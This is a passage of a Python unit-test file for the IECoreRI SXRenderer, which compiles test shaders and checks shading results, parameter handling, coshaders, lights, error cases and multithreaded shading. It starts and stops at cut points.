self.__assertVectorDataAlmostEqual( s["outputFloat"], IECore.ObjectReader( "test/IECoreRI/data/sxOutput/cowFloat.cob" ).read() )
self.__assertVectorDataAlmostEqual( s["outputColor"], IECore.ObjectReader( "test/IECoreRI/data/sxOutput/cowColor.cob" ).read() )
self.__assertVectorDataAlmostEqual( s["Ci"], IECore.ObjectReader( "test/IECoreRI/data/sxOutput/cowCI.cob" ).read() )
self.__assertVectorDataAlmostEqual( s["Oi"], IECore.ObjectReader( "test/IECoreRI/data/sxOutput/cowOI.cob" ).read() )
def testSplineParameter( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/splineTest.sdl test/IECoreRI/shaders/splineTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
r.shader( "surface", "test/IECoreRI/shaders/splineTest.sdl", {
"spl" : IECore.SplinefColor3fData(
IECore.SplinefColor3f(
IECore.CubicBasisf.catmullRom(),
(
( 0, IECore.Color3f( 1, 0, 0 ) ),
( 0, IECore.Color3f( 1, 0, 0 ) ),
( 1, IECore.Color3f( 0, 0, 1 ) ),
( 1, IECore.Color3f( 0, 0, 1 ) ),
)
)
)
} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 10 ) )
s = r.shade( self.__rectanglePoints( b ) )
self.__assertVectorDataAlmostEqual( s["Ci"], IECore.ObjectReader( "test/IECoreRI/data/sxOutput/spline.cob" ).read() )
# make sure that users don't have to provide values for every varying shader parameter if
# they don't want to. this used to crash.
def testMissingPredefinedVariables( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/splineTest.sdl test/IECoreRI/shaders/splineTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
r.shader( "surface", "test/IECoreRI/shaders/splineTest.sdl", {} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 100 ) )
points = self.__rectanglePoints( b )
del points["t"] # remove information the shader requires
s = r.shade( points )
def testParameterTypes( self ) :
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxParameterTest.sdl test/IECoreRI/shaders/sxParameterTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
r.shader( "surface", "test/IECoreRI/shaders/sxParameterTest.sdl", {
"mustBeOne" : 1.0,
"mustBeRed" : IECore.Color3f( 1, 0, 0 ),
"mustBeTwo" : IECore.V3f( 2 ),
"mustBeThree" : IECore.V3f( 3 ),
"mustBeFour" : IECore.V3f( 4 ),
"mustBeHelloWorld" : "helloWorld",
"mustBeOneTwoThree" : IECore.V3f( 1, 2, 3 ),
} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 1 ) )
s = r.shade( self.__rectanglePoints( b ) )
self.assertEqual( s["Ci"][0], IECore.Color3f( 0, 1, 0 ) )
def testFloat3PrimitiveVariable( self ) :
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxParameterTest.sdl test/IECoreRI/shaders/sxParameterTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
r.shader( "surface", "test/IECoreRI/shaders/sxParameterTest.sdl", {
"mustBeOne" : 1.0,
"mustBeRed" : IECore.Color3f( 1, 0, 0 ),
"mustBeTwo" : IECore.V3f( 2 ),
"mustBeThree" : IECore.V3f( 3 ),
"mustBeFour" : IECore.V3f( 4 ),
"mustBeHelloWorld" : "helloWorld",
} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 10 ) )
points = self.__rectanglePoints( b )
points["mustBeOneTwoThree"] = IECore.V3fVectorData( [ IECore.V3f( 1, 2, 3 ) ] * len( points["P"] ) )
s = r.shade( points )
for c in s["Ci"] :
self.assertEqual( c, IECore.Color3f( 0, 1, 0 ) )
def testIntParameterSupport( self ) :
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxParameterTest.sdl test/IECoreRI/shaders/sxParameterTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
r.shader( "surface", "test/IECoreRI/shaders/sxParameterTest.sdl", {
"mustBeOne" : IECore.IntData( 1 ),
"mustBeRed" : IECore.Color3f( 1, 0, 0 ),
"mustBeTwo" : IECore.V3f( 2 ),
"mustBeThree" : IECore.V3f( 3 ),
"mustBeFour" : IECore.V3f( 4 ),
"mustBeHelloWorld" : "helloWorld",
"mustBeOneTwoThree" : IECore.V3f( 1, 2, 3 ),
} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 1 ) )
s = r.shade( self.__rectanglePoints( b ) )
self.assertEqual( s["Ci"][0], IECore.Color3f( 0, 1, 0 ) )
def testBoolParameterSupport( self ) :
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxParameterTest.sdl test/IECoreRI/shaders/sxParameterTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
r.shader( "surface", "test/IECoreRI/shaders/sxParameterTest.sdl", {
"mustBeOne" : IECore.BoolData( True ),
"mustBeRed" : IECore.Color3f( 1, 0, 0 ),
"mustBeTwo" : IECore.V3f( 2 ),
"mustBeThree" : IECore.V3f( 3 ),
"mustBeFour" : IECore.V3f( 4 ),
"mustBeHelloWorld" : "helloWorld",
"mustBeOneTwoThree" : IECore.V3f( 1, 2, 3 ),
} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 1 ) )
s = r.shade( self.__rectanglePoints( b ) )
self.assertEqual( s["Ci"][0], IECore.Color3f( 0, 1, 0 ) )
def testStack( self ) :
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxStackTest.sdl test/IECoreRI/shaders/sxStackTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 100 ) )
points = self.__rectanglePoints( b )
self.assertEqual( r.getAttribute( "color" ), IECore.Color3fData( IECore.Color3f( 1 ) ) )
self.assertEqual( r.getAttribute( "opacity" ), IECore.Color3fData( IECore.Color3f( 1 ) ) )
with IECore.WorldBlock( r ) :
r.setAttribute( "color", IECore.Color3f( 1, 0, 0 ) )
self.assertEqual( r.getAttribute( "color" ), IECore.Color3fData( IECore.Color3f( 1, 0, 0 ) ) )
r.shader( "surface", "test/IECoreRI/shaders/sxStackTest.sdl", { "blue" : 1.0 } )
with IECore.AttributeBlock( r ) :
r.setAttribute( "color", IECore.Color3f( 0, 1, 0 ) )
self.assertEqual( r.getAttribute( "color" ), IECore.Color3fData( IECore.Color3f( 0, 1, 0 ) ) )
r.shader( "surface", "test/IECoreRI/shaders/sxStackTest.sdl", { "blue" : 0.5 } )
s = r.shade( points )
for c in s["Ci"] :
self.assertEqual( c, IECore.Color3f( 0, 0, 0.5 ) )
self.assertEqual( r.getAttribute( "color" ), IECore.Color3fData( IECore.Color3f( 1, 0, 0 ) ) )
s = r.shade( points )
for c in s["Ci"] :
self.assertEqual( c, IECore.Color3f( 0, 0, 1 ) )
self.assertEqual( r.getAttribute( "color" ), IECore.Color3fData( IECore.Color3f( 1 ) ) )
self.assertEqual( r.getAttribute( "opacity" ), IECore.Color3fData( IECore.Color3f( 1 ) ) )
def testNoShader( self ) :
r = IECoreRI.SXRenderer()
with IECore.WorldBlock( r ) :
self.assertRaises( RuntimeError, r.shade, self.__rectanglePoints( IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 100 ) ) ) )
def testCoshaders( self ) :
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxCoshaderTest.sdl test/IECoreRI/shaders/sxCoshaderTest.sl" ), 0 )
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxCoshaderTestMain.sdl test/IECoreRI/shaders/sxCoshaderTestMain.sl" ), 0 )
r = IECoreRI.SXRenderer()
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 100 ) )
points = self.__rectanglePoints( b )
with IECore.WorldBlock( r ) :
r.shader( "shader", "test/IECoreRI/shaders/sxCoshaderTest", { "shaderColor" : IECore.Color3f( 1, 0, 0 ), "__handle" : "cs1" } )
r.shader( "shader", "test/IECoreRI/shaders/sxCoshaderTest", { "sColor" : IECore.Color3f( 0, 1, 0 ), "__handle" : "cs2" } )
r.shader( "shader", "test/IECoreRI/shaders/sxCoshaderTest", { "tColor" : IECore.Color3f( 0, 0, 1 ), "__handle" : "cs3" } )
r.shader( "surface", "test/IECoreRI/shaders/sxCoshaderTestMain", { "coshaders" : IECore.StringVectorData( [ "cs1", "cs2", "cs3" ] ) } )
s = r.shade( points )
self.assertEqual( s["Ci"], IECore.ObjectReader( "test/IECoreRI/data/sxOutput/coshaders.cob" ).read() )
def testCoshadersWithGetVar( self ) :
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxCoshaderTest.sdl test/IECoreRI/shaders/sxCoshaderTest.sl" ), 0 )
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxCoshaderTestMain.sdl test/IECoreRI/shaders/sxCoshaderTestMain.sl" ), 0 )
r = IECoreRI.SXRenderer()
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 4 ) )
points = self.__rectanglePoints( b )
points["forGetVar"] = IECore.Color3fVectorData( [ IECore.Color3f( x[0], x[1], x[2] ) for x in points["P"] ] )
with IECore.WorldBlock( r ) :
r.shader( "shader", "test/IECoreRI/shaders/sxCoshaderTest", { "primVarName" : "forGetVar", "__handle" : "cs1" } )
r.shader( "surface", "test/IECoreRI/shaders/sxCoshaderTestMain", { "coshaders" : IECore.StringVectorData( [ "cs1" ] ) } )
s = r.shade( points )
self.assertEqual( s["Ci"], points["forGetVar"] )
def testGrids( self ) :
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxGridTest.sdl test/IECoreRI/shaders/sxGridTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 20, 10 ) )
points = self.__rectanglePoints( b )
with IECore.WorldBlock( r ) :
r.shader( "surface", "test/IECoreRI/shaders/sxGridTest", {} )
# not providing enough points for the grid should raise
self.assertRaises( RuntimeError, r.shade, points, IECore.V2i( 100, 500 ) )
s = r.shade( points )
del s["P"] # test data on disk was created before we supported P as an output
del s["N"] # test data on disk was created before we supported N as an output
self.assertEqual( s, IECore.ObjectReader( "test/IECoreRI/data/sxOutput/noGrid.cob" ).read() )
s = r.shade( points, IECore.V2i( 21, 11 ) )
del s["P"] # test data on disk was created before we supported P as an output
del s["N"] # test data on disk was created before we supported N as an output
self.assertEqual( s, IECore.ObjectReader( "test/IECoreRI/data/sxOutput/grid.cob" ).read() )
def testPlaneShade( self ) :
r = IECoreRI.SXRenderer()
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxStTest.sdl test/IECoreRI/shaders/sxStTest.sl" ), 0 )
r.shader( "surface", "test/IECoreRI/shaders/sxStTest.sdl", {} )
data = r.shadePlane( IECore.V2i( 64, 64 ) )
del data["P"]
del data["N"]
self.assertEqual( data, IECore.Reader.create( "test/IECoreRI/data/sxOutput/shadePlaneCompoundData.cob" ).read() )
image = r.shadePlaneToImage( IECore.V2i( 64, 64 ) )
expectedImage = IECore.Reader.create( "test/IECoreRI/data/sxOutput/shadePlaneImage.exr" ).read()
self.assertEqual( IECore.ImageDiffOp()( imageA=image, imageB=expectedImage, maxError=0 ), IECore.BoolData( False ) )
def testWrongType( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/splineTest.sdl test/IECoreRI/shaders/splineTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
r.shader( "surface", "test/IECoreRI/shaders/splineTest.sdl", {} )
p = self.__rectanglePoints( IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 10 ) ) )
p["t"] = p["P"]
self.assertRaises( RuntimeError, r.shade, p )
def testWrongSize( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/splineTest.sdl test/IECoreRI/shaders/splineTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
r.shader( "surface", "test/IECoreRI/shaders/splineTest.sdl", {} )
p = self.__rectanglePoints( IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 10 ) ) )
del p["t"][-10:]
self.assertRaises( RuntimeError, r.shade, p )
def testDisplacementShader( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxDisplacementTest.sdl test/IECoreRI/shaders/sxDisplacementTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
with IECore.WorldBlock( r ) :
r.shader( "displacement", "test/IECoreRI/shaders/sxDisplacementTest.sdl", {} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 20, 10 ) )
points = self.__rectanglePoints( b )
## need to use a grid topology if we want calculatenormal() to work
s = r.shade( points, IECore.V2i( 21, 11 ) )
self.assertEqual( len( s ), 2 )
self.failUnless( "P" in s )
self.failUnless( "N" in s )
for i in range( 0, len( points["P"] ) ) :
self.failUnless( s["P"][i].equalWithAbsError( points["P"][i] + points["N"][i], 0.001 ) )
self.failUnless( s["N"][i].equalWithAbsError( IECore.V3f( 0, 0, 1 ), 0.001 ) )
def testDisplacementAndSurfaceShaders( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxDisplacementTest.sdl test/IECoreRI/shaders/sxDisplacementTest.sl" ), 0 )
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxTest.sdl test/IECoreRI/shaders/sxTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
with IECore.WorldBlock( r ) :
r.shader( "displacement", "test/IECoreRI/shaders/sxDisplacementTest.sdl", {} )
r.shader( "surface", "test/IECoreRI/shaders/sxTest.sdl", {} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 20, 10 ) )
points = self.__rectanglePoints( b )
## need to use a grid topology if we want calculatenormal() to work
s = r.shade( points, IECore.V2i( 21, 11 ) )
self.assertEqual( len( s ), 6 )
self.failUnless( "P" in s )
self.failUnless( "N" in s )
self.failUnless( "Ci" in s )
self.failUnless( "Oi" in s )
self.failUnless( "outputFloat" in s )
self.failUnless( "outputColor" in s )
for i in range( 0, len( points["P"] ) ) :
self.failUnless( s["P"][i].equalWithAbsError( points["P"][i] + points["N"][i], 0.001 ) )
self.failUnless( s["N"][i].equalWithAbsError( IECore.V3f( 0, 0, 1 ), 0.001 ) )
def testLights( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxLightTest.sdl test/IECoreRI/shaders/sxLightTest.sl" ), 0 )
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxIlluminanceTest.sdl test/IECoreRI/shaders/sxIlluminanceTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
with IECore.WorldBlock( r ) :
r.shader( "surface", "test/IECoreRI/shaders/sxIlluminanceTest", {} )
r.light( "test/IECoreRI/shaders/sxLightTest", "light0", {} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 20, 10 ) )
points = self.__rectanglePoints( b )
s = r.shade( points, IECore.V2i( 21, 11 ) )
for i in range( 0, len( points["P"] ) ) :
c = s["Ci"][i]
self.assertEqual( points["P"][i], IECore.V3f( c[0], c[1], c[2] ) )
def testPredefinedPrimitiveVariables( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxPredefinedPrimitiveVariableTest.sdl test/IECoreRI/shaders/sxPredefinedPrimitiveVariableTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
with IECore.WorldBlock( r ) :
r.shader( "surface", "test/IECoreRI/shaders/sxPredefinedPrimitiveVariableTest", {} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 20, 10 ) )
points = self.__rectanglePoints( b )
s = r.shade( points, IECore.V2i( 21, 11 ) )
for i in range( 0, len( points["P"] ) ) :
self.assertEqual( s["Ci"][i], IECore.Color3f( 1, 1, 1 ) )
def testNonPredefinedPrimitiveVariables( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxNonPredefinedPrimitiveVariableTest.sdl test/IECoreRI/shaders/sxNonPredefinedPrimitiveVariableTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
with IECore.WorldBlock( r ) :
r.shader( "surface", "test/IECoreRI/shaders/sxNonPredefinedPrimitiveVariableTest", {} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 20, 10 ) )
points = self.__rectanglePoints( b )
points["colorPrimVar"] = IECore.Color3fVectorData( [ IECore.Color3f( v[0], v[1], v[2] ) for v in points["P"] ] )
points["floatPrimVar"] = points["s"]
s = r.shade( points, IECore.V2i( 21, 11 ) )
for i in range( 0, len( points["P"] ) ) :
c = points["colorPrimVar"][i]
c[0] = points["s"][i]
self.assertEqual( s["Ci"][i], c )
def testNonPredefinedPrimitiveVariablesForCoshaders( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxCoshaderTestMain.sdl test/IECoreRI/shaders/sxCoshaderTestMain.sl" ), 0 )
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxCoshaderTest.sdl test/IECoreRI/shaders/sxCoshaderTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
with IECore.WorldBlock( r ) :
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 20, 10 ) )
points = self.__rectanglePoints( b )
points["colorPrimVar"] = IECore.Color3fVectorData( [ IECore.Color3f( v[0], v[1], v[2] ) for v in points["P"] ] )
r.shader( "shader", "test/IECoreRI/shaders/sxCoshaderTest", { "__handle" : "cs1" } )
r.shader( "surface", "test/IECoreRI/shaders/sxCoshaderTestMain", { "coshaders" : IECore.StringVectorData( [ "cs1" ] ) } )
s = r.shade( points, IECore.V2i( 21, 11 ) )
self.assertEqual( s["Ci"], points["colorPrimVar"] )
def testUniformPrimitiveVariables( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxUniformPrimitiveVariableTest.sdl test/IECoreRI/shaders/sxUniformPrimitiveVariableTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
with IECore.WorldBlock( r ) :
r.shader( "surface", "test/IECoreRI/shaders/sxUniformPrimitiveVariableTest", {} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 20, 10 ) )
points = self.__rectanglePoints( b )
points["colorPrimVar"] = IECore.Color3fData( IECore.Color3f( 0, 0.5, 1 ) )
points["floatPrimVar"] = IECore.FloatData( 16.0 )
points["vectorPrimVar"] = IECore.V3fData( IECore.V3f( 0.25, 0.5, 2 ) )
points["stringPrimVar"] = IECore.StringData( "hello shader!" )
points["stringVectorPrimVar"] = IECore.StringVectorData( ["who's", "a", "good", "boy" ] )
s = r.shade( points, IECore.V2i( 21, 11 ) )
for i in range( 0, len( points["P"] ) ) :
self.assertEqual( s["Ci"][i], IECore.Color3f( 0.125, 0.25, 0.75 ) )
def testUniformPrimitiveVariableShaderParameters( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxUniformPrimitiveVariableShaderParameterTest.sdl test/IECoreRI/shaders/sxUniformPrimitiveVariableShaderParameterTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
with IECore.WorldBlock( r ) :
r.shader( "surface", "test/IECoreRI/shaders/sxUniformPrimitiveVariableShaderParameterTest", {} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 20, 10 ) )
points = self.__rectanglePoints( b )
points["colorPrimVar"] = IECore.Color3fData( IECore.Color3f( 0, 0.5, 1 ) )
points["floatPrimVar"] = IECore.FloatData( 16.0 )
points["vectorPrimVar"] = IECore.V3fData( IECore.V3f( 0.25, 0.5, 2 ) )
points["stringPrimVar"] = IECore.StringData( "hello shader!" )
points["stringVectorPrimVar"] = IECore.StringVectorData( ["who's", "a", "good", "boy" ] )
s = r.shade( points, IECore.V2i( 21, 11 ) )
for i in range( 0, len( points["P"] ) ) :
self.assertEqual( s["Ci"][i], IECore.Color3f( 0.125, 0.25, 0.5 ) )
def testThreading( self ) :
# set up a renderer with a shader in it
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxTest.sdl test/IECoreRI/shaders/sxTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
r.shader( "surface", "test/IECoreRI/shaders/sxTest.sdl", { "noiseFrequency" : 1.0, "tint" : IECore.Color3f( 1 ) } )
# and get some points to shade
points = IECore.CompoundData( {
"N" : self.__loadImage( "test/IECoreRI/data/sxInput/cowN.exr" ),
"Ng" : self.__loadImage( "test/IECoreRI/data/sxInput/cowN.exr" ),
"P" : self.__loadImage( "test/IECoreRI/data/sxInput/cowP.exr" ),
"I" : self.__loadImage( "test/IECoreRI/data/sxInput/cowI.exr" ),
} )
# shade in lots of different threads at the same time
def s( i ) :
results[i] = r.shade( points )
threads = []
results = []
for i in range( 0, 300 ) :
threads.append( threading.Thread( target = IECore.curry( s, i ) ) )
results.append( None )
for t in threads :
t.start()
for t in threads :
t.join()
# and check that it all worked
cowFloat = IECore.ObjectReader( "test/IECoreRI/data/sxOutput/cowFloat.cob" ).read()
cowColor = IECore.ObjectReader( "test/IECoreRI/data/sxOutput/cowColor.cob" ).read()
cowCI = IECore.ObjectReader( "test/IECoreRI/data/sxOutput/cowCI.cob" ).read()
cowOI = IECore.ObjectReader( "test/IECoreRI/data/sxOutput/cowOI.cob" ).read()
# check that the first set of results is close enough to the expected results.
# we allow some small variation as 3delight's noise routines seem to yield
# very, very small differences between some versions.
self.__assertVectorDataAlmostEqual( results[0]["outputFloat"], cowFloat )
self.__assertVectorDataAlmostEqual( results[0]["outputColor"], cowColor )
self.__assertVectorDataAlmostEqual( results[0]["Ci"], cowCI )
self.__assertVectorDataAlmostEqual( results[0]["Oi"], cowOI )
# check that all results are exactly equal to the first set. even if we
# accept small variations between different 3delight versions we don't accept
# variation within one version.
for s in results :
self.assertEqual( len( s ), 6 )
self.failUnless( "outputFloat" in s )
self.failUnless( "outputColor" in s )
self.failUnless( "Ci" in s )
self.failUnless( "Oi" in s )
self.failUnless( "P" in s )
self.failUnless( "N" in s )
self.assertEqual( s["outputFloat"], results[0]["outputFloat"] )
self.assertEqual( s["outputColor"], results[0]["outputColor"] )
self.assertEqual( s["Ci"], results[0]["Ci"] )
self.assertEqual( s["Oi"], results[0]["Oi"] )
def testGetVar( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxGetVarTest.sdl test/IECoreRI/shaders/sxGetVarTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
with IECore.WorldBlock( r ) :
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 20, 10 ) )
points = self.__rectanglePoints( b )
points["floatValue1"] = points["s"]
points["floatValue2"] = points["t"]
r.shader( "surface", "test/IECoreRI/shaders/sxGetVarTest", { } )
s = r.shade( points, IECore.V2i( 21, 11 ) )
for i in range( 0, len( s["Ci"] ) ) :
self.assertEqual( s["Ci"][i], IECore.Color3f( 0, points["floatValue1"][i], points["floatValue2"][i] ) )
def testGetShaderInConstruct( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxGetShaderTest.sdl test/IECoreRI/shaders/sxGetShaderTest.sl" ), 0 )
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxCoshaderTest.sdl test/IECoreRI/shaders/sxCoshaderTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
with IECore.WorldBlock( r ) :
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 20, 10 ) )
points = self.__rectanglePoints( b )
r.shader( "shader", "test/IECoreRI/shaders/sxCoshaderTest", { "__handle" : "cs1", "sColor" : IECore.Color3f( 0, 1, 0 ), } )
r.shader( "surface", "test/IECoreRI/shaders/sxGetShaderTest", { "coshader" : IECore.StringData( "cs1" ) } )
s = r.shade( points, IECore.V2i( 21, 11 ) )
for i in range( 0, len( points["P"] ) ) :
self.assertEqual( s["Ci"][i], IECore.Color3f( 0, points["s"][i], 0 ) )
def testCoshadersStack( self ) :
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxCoshaderTest.sdl test/IECoreRI/shaders/sxCoshaderTest.sl" ), 0 )
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxCoshaderTestMain.sdl test/IECoreRI/shaders/sxCoshaderTestMain.sl" ), 0 )
r = IECoreRI.SXRenderer()
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 100 ) )
points = self.__rectanglePoints( b )
with IECore.WorldBlock( r ) :
r.shader( "shader", "test/IECoreRI/shaders/sxCoshaderTest", { "shaderColor" : IECore.Color3f( 1, 0, 0 ), "__handle" : "cs1" } )
r.shader( "shader", "test/IECoreRI/shaders/sxCoshaderTest", { "sColor" : IECore.Color3f( 0, 1, 0 ), "__handle" : "cs2" } )
r.shader( "shader", "test/IECoreRI/shaders/sxCoshaderTest", { "tColor" : IECore.Color3f( 0, 0, 1 ), "__handle" : "cs3" } )
with IECore.AttributeBlock( r ) :
# these guys should be popped and therefore not affect the result
r.shader( "shader", "test/IECoreRI/shaders/sxCoshaderTest", { "shaderColor" : IECore.Color3f( 1, 1, 1 ), "__handle" : "cs1" } )
r.shader( "shader", "test/IECoreRI/shaders/sxCoshaderTest", { "sColor" : IECore.Color3f( 1, 1, 0 ), "__handle" : "cs2" } )
r.shader( "shader", "test/IECoreRI/shaders/sxCoshaderTest", { "tColor" : IECore.Color3f( 0.5, 0, 0.25 ), "__handle" : "cs3" } )
r.shader( "surface", "test/IECoreRI/shaders/sxCoshaderTestMain", { "coshaders" : IECore.StringVectorData( [ "cs1", "cs2", "cs3" ] ) } )
s = r.shade( points )
self.assertEqual( s["Ci"], IECore.ObjectReader( "test/IECoreRI/data/sxOutput/coshaders.cob" ).read() )
def testLightsStack( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxLightTest.sdl test/IECoreRI/shaders/sxLightTest.sl" ), 0 )
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxIlluminanceTest.sdl test/IECoreRI/shaders/sxIlluminanceTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
with IECore.WorldBlock( r ) :
r.shader( "surface", "test/IECoreRI/shaders/sxIlluminanceTest", {} )
r.light( "test/IECoreRI/shaders/sxLightTest", "light0", {} )
with IECore.AttributeBlock( r ) :
# this guy should be popped and therefore not affect the result
r.light( "test/IECoreRI/shaders/sxLightTest", "light1", {} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 20, 10 ) )
points = self.__rectanglePoints( b )
s = r.shade( points, IECore.V2i( 21, 11 ) )
for i in range( 0, len( points["P"] ) ) :
c = s["Ci"][i]
self.assertEqual( points["P"][i], IECore.V3f( c[0], c[1], c[2] ) )
def testZeroLength( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/splineTest.sdl test/IECoreRI/shaders/splineTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
r.shader( "surface", "test/IECoreRI/shaders/splineTest.sdl", {} )
p = self.__rectanglePoints( IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 10 ) ) )
for k, v in p.items() :
del v[:]
self.assertRaises( RuntimeError, r.shade, p )
def testThreadedTextureLookups( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxTextureTest.sdl test/IECoreRI/shaders/sxTextureTest.sl" ), 0 )
points = self.__rectanglePoints( IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 255 ) ) )
# by default you should be able to run as many threads as the hardware will support
# concurrently.
for i in range( 0, 10 ) :
r = IECoreRI.SXRenderer()
r.shader( "surface", "test/IECoreRI/shaders/sxTextureTest.sdl", {
"fileName" : os.path.realpath( "./test/IECoreRI/data/textures/uvMap.256x256.tdl" ),
} )
# note the -1 when determining the number of threads. 3delight behaviour changed around
# 10.0.35, such that render:nthreads (which defaults to hardwareConcurrency()) is the
# number of threads that will be making Sx calls of any sort, whereas prior to that it
# was the number of threads that would actually call SxCallShader. because we've set up
# the renderer on this thread, it's taken one off the count for the number of threads we
# can spawn to do the shading.
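# as a concrete illustration (made-up numbers): if IECore.hardwareConcurrency()
# returns 8, the default render:nthreads budget is also 8; this setup thread
# occupies one slot, so the loop below spawns only 8 - 1 = 7 shading threads.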
threads = []
for i in range( 0, IECore.hardwareConcurrency() - 1 ) :
threads.append( threading.Thread( target = IECore.curry( r.shade, points ) ) )
for t in threads :
t.start()
for t in threads :
t.join()
# but if you want to use more than that, you need to let the library know about it
# by calling setOption( "ri:render:nthreads" )
for i in range( 0, 10 ) :
r = IECoreRI.SXRenderer()
# see above - we're adding one to number of threads we'll be using to do the shading,
# because we've also used a thread (the current thread) to perform the setup.
r.setOption( "ri:render:nthreads", IECore.IntData( IECore.hardwareConcurrency() * 2 + 1 ) )
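# e.g. (illustrative) with 8 hardware threads this asks for nthreads = 2 * 8 + 1 = 17:
# the 16 shading threads spawned below plus this setup thread.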
r.shader( "surface", "test/IECoreRI/shaders/sxTextureTest.sdl", {
"fileName" : os.path.realpath( "./test/IECoreRI/data/textures/uvMap.256x256.tdl" ),
} )
threads = []
for i in range( 0, IECore.hardwareConcurrency() * 2 ) :
threads.append( threading.Thread( target = IECore.curry( r.shade, points ) ) )
for t in threads :
t.start()
for t in threads :
t.join()
def tearDown( self ) :
files = [
"test/IECoreRI/shaders/sxTest.sdl",
"test/IECoreRI/shaders/splineTest.sdl",
"test/IECoreRI/shaders/sxParameterTest.sdl",
"test/IECoreRI/shaders/sxStackTest.sdl",
"test/IECoreRI/shaders/sxCoshaderTest.sdl",
"test/IECoreRI/shaders/sxCoshaderTestMain.sdl",
"test/IECoreRI/shaders/sxGridTest.sdl",
